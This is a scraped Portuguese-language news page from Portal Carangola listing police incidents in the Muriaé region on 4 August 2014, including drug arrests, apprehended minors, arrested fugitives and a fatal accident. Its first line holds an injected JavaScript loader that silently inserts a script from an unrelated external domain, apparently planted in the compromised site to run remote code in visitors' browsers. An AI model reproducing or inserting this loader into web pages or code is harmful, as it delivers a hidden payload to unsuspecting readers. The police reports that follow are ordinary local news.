;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais em destaque-Carangola e Região-04/08/14. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais em destaque-Carangola e Região-04/08/14.

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 04/08/2014

                           76ª CIA PM – MURIAÉ-MG

PM EFETUA PRISÃO E APREENDE MENOR POR TRÁFICO ILÍCITO DE DROGAS EM MURIAÉ

Em 31/07/2014, por volta das 16h30min, na Rua Independência, no Bairro São Cristóvão, militares informados sobre um furto de celular de uma loja, deslocaram até um ponto conhecido por haver tráfico drogas, e ao aproximarem do local, avistaram a menor S.R.M.S. de16 anos, M.A.R. de 13 anos, e R.H.S.M. de 19 anos, e dado ordem de parada, evadiram para o interior da residência. Sendo observado que uma das menores estava com uma bolsa e retirou de seu interior um volume de cor cinza e entregou a um dos comparsas que, com o material em sua mão, evadiu para os fundos da residência, pulando os muros do quintal vizinho. Moradores que não quiseram se identificar, afirmaram que ele estava com uma sacola com uma grande quantidade de drogas em seu interior e que utiliza as menores para levarem droga deste local, na rua INDEPENDÊNCIA para o local conhecido como “BOCA DA GRAZIELA”, na rua CARLOS DIAS GOES. Durante buscas, no interior da residência, foi localizada 01 bucha de maconha, 01 TV SONY, BRAVIA 32”, de cor preta de procedência duvidosa, e na bolsa de uma menor localizaram R$90,00, 01 celular LG e o celular SAMSUNG DUOS, cor cinza, que havia sido furtado no interior da loja LACERDA ALIANÇAS, sendo o mesmo reconhecido pela vítima. A menor é namorada do autor, sendo apreendida em flagrante e encaminhada à DPJ.

PM PRENDE FORAGIDO DA JUSTIÇA EM BARÃO DO MONTE ALTO

Em 31/07/2014, por volta das 15h30min, na Rua Othônio Antunes, no Centro, A.M.R. de 35 anos, foi abordado e em consulta ao ISP, consta um mandado de prisão em desfavor do mesmo. Face ao exposto, foi dado voz de prisão ao autor e conduzido à DPJ.

PM REGISTRA DANO MATERIAL EM PENITENCIÁRIA EM MURIAÉ

Em 01/08/2014, por volta das 16h, na Avenida Luciano Rodrigues Paula, no Leblon, compareceu no posto policial, o Agente Penitenciário, E.M.F. de 32 anos, relatando que no dia 19/06/2014, o detento W.A.S. de 28 anos, ateou fogo em um cobertor e em uma camisa, causando um grande transtorno, pois colocou em risco a vida dele e de outros detentos, além do dano nos materiais do estado.

PM EFETUA PRISÃO POR TRÁFICO ILÍCITO DE DROGAS EM MURIAÉ

 Em 01/08/2014, por volta das 20h30min, na Avenida Monteiro de Castro, na Barra, militares depararam com um tumulto, envolvendo alguns indivíduos que prestam serviço de segurança particular, sendo encontrado 12 papelotes de cocaína com R.O.S. de 22 anos, e este informou que levaria a droga para uma festa na VILA VARDIERO, “FESTA DO ARROZ”, para uso, porém populares informaram que ele estava realizando a venda da droga na PRAÇA DO TRABALHADOR. Foi dado voz de prisão em flagrante ao autor e conduzido à DPJ.

PM FAZ APREENSÃO DE MENOR POR TRÁFICO ILÍCITO DE DROGAS EM MURIAÉ

 Em 01/08/2014, por volta das 22h15min, na Vila Santos Dumont, no Bairro Aeroporto, ao avistar os militares, um indivíduo empreendeu fuga para o interior de um beco, sendo capturado S.D.R. de 17 anos e, no trajeto de fuga, localizado 29 papelotes de cocaína. Na residência deste, sua genitora permitiu a entrada, sendo localizado escondido na laje 01 computador completo. Foi dada voz de apreensão ao infrator e conduzido à DPJ junto com a droga e o computador.

PM APREENDE MENOR POR POSSE ILEGAL DE MUNIÇÃO EM MURIAÉ

 Em 02/08/2014, por volta das 23h30min, na Rua Ubá, no Bairro Santa Terezinha, policiais avistaram L.M.S. de 14 anos, o qual, ao avistar a VP, empreendeu fuga, sendo abordado, momento em que dispensou no solo uma munição cal.38 SPL, marca CBC, ponta ogival, intacta, que foi apreendida. Foi dada voz de apreensão em flagrante ao menor infrator e conduzido à DPJ.

PM PRENDE POR PORTE ILEGAL DE ARMA DE FOGO EM MURIAÉ

 Em 02/08/2014, por volta das 07h, na Rua Antônio Ramos, no Bairro Aeroporto, após denúncias que um indivíduo conhecido estava no local efetuando disparos com o objetivo de matar G.N. de 30 anos, militares, em rastreamento já pela rua CAVALIER, localizaram o autor, o qual portava na cintura uma garrucha CAL.44, municiada com 02 cartuchos intactos e 02 cartuchos deflagrados no bolso da calça, sendo dado voz de prisão ao autor e este disse que estava portando a arma devido ao fato de ter sido alvejado por 02 disparos de arma de fogo há 04 dias. Em consulta ao ISP, foi constatado ainda mandado de prisão contra o autor que foi conduzido à DPJ, e teve sua prisão ratificada.

75ª CIA PM – MURIAÉ-MG

  PM EFETUA PRISÃO DE FORAGIDO DA JUSTIÇA EM SÃO FRANCISCO DO GLÓRIA

Em 31/07/2014, por volta das 13h30min, no Córrego Residência, Zona Rural de São Francisco do Glória, militares abordaram R.B.R. de 28 anos, sendo constatado mandado de prisão contra o mesmo, devido a homicídio ocorrido em ITAGUAÍ-RJ, sendo dado voz de prisão e conduzido à DPJ.

PM PRENDE FORAGIDO DA JUSTIÇA POR LESÃO CORPORAL EM ORIZÂNIA

Em 31/07/2014, por volta das 14h, no Córrego Grande, Zona Rural de Orizânia, militares depararam com a ambulância prestando socorro a I.C.S.R. de 23 anos, a qual havia sido agredida por S.S.B. de 27 anos. O autor afirmou que na data de ontem agrediu a esposa após uma discussão, sendo que a equipe policial reconheceu o autor e já tinham ciência de que contra ele havia um mandado de prisão em aberto. Foi dado voz de prisão ao mesmo o qual foi conduzido à DPJ.

PM CUMPRE MANDADO DE PRISÃO EM DIVINO

Em 01/08/2014, por volta das 16h, na Rua Jardim Izilda, em Bom Jesus do Divino, em ação conjunta, militares deram cumprimento ao mandado de prisão em desfavor de J.O.S. de 20 anos, sendo conduzido à DPJ.

PM REGISTRA ACIDENTE DE TRÂNSITO COM VÍTIMA FATAL EM ORIZÂNIA

Em 03/08/2014, por volta das 02h30min, no Córrego do Indaiá, Zona Rural de Orizânia, militares depararam com o acidente de trânsito e com a vítima F.A. de 49 anos, caído ao solo já sem vida. R.H.F. de 32 anos relatou que, ao passar pelo local, deparou com a vítima. Testemunhas não souberam informar quem poderia ter atropelado o indivíduo. A perícia compareceu no local, realizou os serviços de praxe e removeu o corpo para o IML de MURIAÉ.

   ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.